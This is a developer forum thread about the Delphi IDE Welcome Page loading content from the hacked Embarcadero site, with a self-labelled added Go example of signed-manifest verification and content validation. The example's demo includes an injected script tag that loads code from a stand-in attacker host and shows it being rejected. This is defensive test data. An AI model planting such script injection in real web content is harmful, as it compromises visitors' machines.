Given the recent problems with Embarcadero.com's website, have you disabled the Welcome Page within your Delphi IDE? See: http://wiert.me/2016/03/14/delphi-disable-or-change-your-welcome-page-to-not-use-the-embarcadero-site-as-that-site-has-been-hacked-twice-this-weekend/

Comments

  1. /sub, interested in the results. I disabled it in response to recent events.

  2. I don't disable it per se, but since I always work out of the same project group - I simply removed the tab a long time ago.

  3. I normally tend to disable the built-in one and use the Delphi-Praxis one since XE8, I only saw the problem at the weekend because the VM I was playing in is a very recent Seattle install and I hadn't "finished it off" yet.

    Having said that, I tend to use the same 3 or 4 proj files all the time, I don't really make that much use of the screen anyway.

  4. I'd like to see it actually contain community news and/or the GetIt content.

  5. Eli M I'd like to see my IDE not load any content from the Internet at all without my strict permission.

  6. never used, just the recent projects page.

  7. Eli M Agreed, it could be much more useful. Fred Ahrens Or at least in a sandboxed browser. I've written a welcome screen before, and rather than being a web control, it instead got data from a server (a list of recent forum posts, for example) and validated & displayed that. No Javascript, had validation, hopefully far more secure, still useful.

  8. If it would download anything, only over https. Oh wait. Grade F https...

  9. David Millington That's the right path...any content received should be validated before displayed.  I would suggest that they could contract out EldoS Corporation, the makers of SecureBlackbox, to develop a new Welcome Page screen which presents data in a secure manner and the package could be presented with source to demonstrate how it's done right. (One would need SBB components to rebuild the package.) Eldos gets some ongoing advertising, Embarcadero Technologies fixes a large gaping security hole in their product, and the rest of us go back to listening to Bobby McFerrin.  https://www.youtube.com/watch?v=d-diB65scQU

  10. Fred Ahrens Don't use Windows 10 then because the floodgates are wide open.

  11. Darian Miller Good idea. Suggest it to them? Eli M I installed Win10 when it came out... and it's horrible. Ignoring the privacy concerns, not a nice UI or anything. I'm back on Win7 now and happier than ever.

  12. Eli M Ah yes, Win10 issue is mainly sending your data out versus this issue of bringing non-secure, non-validated (and in this case, completely compromised) data in within a browser container that could potentially compromise your system.

  13. David Millington Jim forwarded my questions to Brandon Shopp, Senior Director of Product Management, on Tuesday.  When/if he writes me back, I'll make the suggestion directly. Of course, Eldos would have to have time and desire to do it and they'd have to agree on $/licensing/etc.. so it's not a slam dunk.  Maybe someone could put up a GitHub repo with a working welcome page replacement that displays data in a secure fashion...that might be a fun side project to do.  Didn't you write a welcome page already?  : )

  14. Darian Miller thank you for the good challenge. It's not trivial (from a security point of view) to decide whether the content is trusted. We need an external trust anchor, and that anchor should be updated as soon as the web page is legitimately updated. E.g. we could store a hash of the web homepage (or any page) in the DNS record and that would make the work of such hijackers harder, but the problem with the DNS is that it's not updated immediately and the person who alters the homepage might have no permission to alter the DNS records. TLS alone won't help either because the certificate's private key is on the web site's server (in most cases) and signing the web page in any way in many cases can be hijacked in the same way as the web page is. Still there are some ideas to think about here.

  15. EldoS Corporation You're welcome.. it is definitely a challenge. I will note that it is a little easier when you control both sides of the conversation.  Perhaps a third location is introduced, like a public S3 bucket, that contains signatures for specific content versions. When receiving content, it would contain a specific version which would be cross-referenced with this 3rd location as a workaround for synchronization issues.  Before new content is posted, its hash/signature is created and updated to the 3rd location while older versions auto expire over time.  It would require a much more complicated intrusion to overcome and yet it seemingly wouldn't be overly burdensome to create/manage.

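The scheme sketched in comments 14 and 15 (authenticate the data itself rather than the transport; keep signatures for specific content versions at a third location, signed with a key that is not on the web server; validate the content before displaying it, as in comment 7), as an added example that is not part of this thread and not Embarcadero's or EldoS's code. It is written in Go with the standard library's Ed25519 and SHA-256. Everything in it is assumed: the `Content`/`Manifest` shapes, the "version\nhash" signing input, the version tag, the sample headlines and the `evil.example` host are all constructed for the example; the two network fetches (content from the web server, manifest from the third location) are not shown, both are just values in memory.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"strings"
	"unicode"
)

// Content is what the IDE pulls from the (untrusted) web server: a version
// tag plus a plain-text body, one headline per line. Constructed shape.
type Content struct {
	Version string
	Body    string
}

// ManifestEntry is what the hypothetical third location holds per version:
// the hex SHA-256 of the body and an Ed25519 signature over "version\nhash"
// made with an offline publisher key. The manifest is keyed by version.
type ManifestEntry struct {
	Hash string
	Sig  []byte
}
type Manifest map[string]ManifestEntry

// NewKeyPair generates the publisher's key; only the public half is pinned in the client.
func NewKeyPair() (ed25519.PublicKey, ed25519.PrivateKey) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	return pub, priv
}

func hashHex(body string) string {
	sum := sha256.Sum256([]byte(body))
	return hex.EncodeToString(sum[:])
}

func signingInput(version, hash string) []byte { return []byte(version + "\n" + hash) }

// Publish is the offline step run before new content is posted: hash the
// body, sign version+hash, and store both in the manifest.
func Publish(priv ed25519.PrivateKey, m Manifest, c Content) {
	h := hashHex(c.Body)
	m[c.Version] = ManifestEntry{Hash: h, Sig: ed25519.Sign(priv, signingInput(c.Version, h))}
}

// Verify is the client step. The manifest entry must carry a valid signature
// under the pinned key, and the fetched body must hash to the signed value.
// TLS on either fetch still helps against tampering in transit, but the
// authenticity decision is made here, not by the transport.
func Verify(pub ed25519.PublicKey, m Manifest, c Content) error {
	entry, ok := m[c.Version]
	if !ok {
		return errors.New("unknown content version: not present in manifest")
	}
	if !ed25519.Verify(pub, signingInput(c.Version, entry.Hash), entry.Sig) {
		return errors.New("manifest signature does not verify under pinned key")
	}
	if hashHex(c.Body) != entry.Hash {
		return errors.New("content hash does not match signed manifest entry")
	}
	return nil
}

// ValidateLines enforces the content format before anything is shown:
// printable text only, no markup characters, bounded item count and length.
// A signed blob is still treated as data, never as HTML or script.
func ValidateLines(body string, maxItems, maxLen int) ([]string, error) {
	var items []string
	for _, line := range strings.Split(body, "\n") {
		line = strings.TrimSpace(line)
		if line == "" {
			continue
		}
		if len(line) > maxLen {
			return nil, fmt.Errorf("item longer than %d bytes", maxLen)
		}
		for _, r := range line {
			if !unicode.IsPrint(r) || r == '<' || r == '>' {
				return nil, fmt.Errorf("disallowed character %q in item", r)
			}
		}
		items = append(items, line)
		if len(items) > maxItems {
			return nil, fmt.Errorf("more than %d items", maxItems)
		}
	}
	return items, nil
}

func main() {
	pub, priv := NewKeyPair()
	manifest := Manifest{}
	good := Content{Version: "2016-03-14.1", Body: "Welcome Page now signed\nGetIt: three new packages\n"} // constructed sample
	Publish(priv, manifest, good)
	// A defaced web server changes the body but cannot touch the manifest; and even
	// if it could rewrite the hash there, the old signature no longer covers it.
	defaced := Content{Version: good.Version, Body: good.Body + "<script src=\"//evil.example/x.js\"></script>\n"}
	forged := Manifest{good.Version: ManifestEntry{Hash: hashHex(defaced.Body), Sig: manifest[good.Version].Sig}}
	fmt.Println("legitimate:", Verify(pub, manifest, good))
	fmt.Println("defaced body, intact manifest:", Verify(pub, manifest, defaced))
	fmt.Println("defaced body, forged manifest:", Verify(pub, forged, defaced))
	_, err := ValidateLines(defaced.Body, 20, 120)
	fmt.Println("markup rejected:", err)
}
```

The two gates are deliberately separate: `Verify` answers "did the publisher sign exactly these bytes for this version", and `ValidateLines` answers "is this something the IDE is willing to render as text". Either failing means nothing is displayed. Comment 14's concern about the signing key sitting next to the web content is addressed only if `Publish` really runs offline; if the private key is deployed to the same server the manifest buys nothing.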
  16. A simple RSS feed reader would suffice.

  17. Eli M No RSS feed reader for me... same exact problem that we just experienced.  The dev machine needs to stay secure.  This should be off by default, and perhaps will be off in the next version.

  18. EldoS Corporation in many places, TLS is done with off-loading (for instance F5 can do this https://f5.com/glossary/ssl-offloading) so that does not need to be a problem.
    It does warrant an organisation that knows their IT. With the current state of affairs I'm not so sure EMBT knows.

  19. Jeroen Wiert Pluimers When the web site is hacked, we don't know how far the breach has gone. Also, TLS more or less guarantees that the data has not been altered in transit and that you have connected to the intended server. But it doesn't authenticate the data itself. TLS alone will neither save one from defacing a web site, nor will it prove authenticity of the data.

  20. EldoS Corporation trust me: I know. It's the EMBT people that we need to convince (:
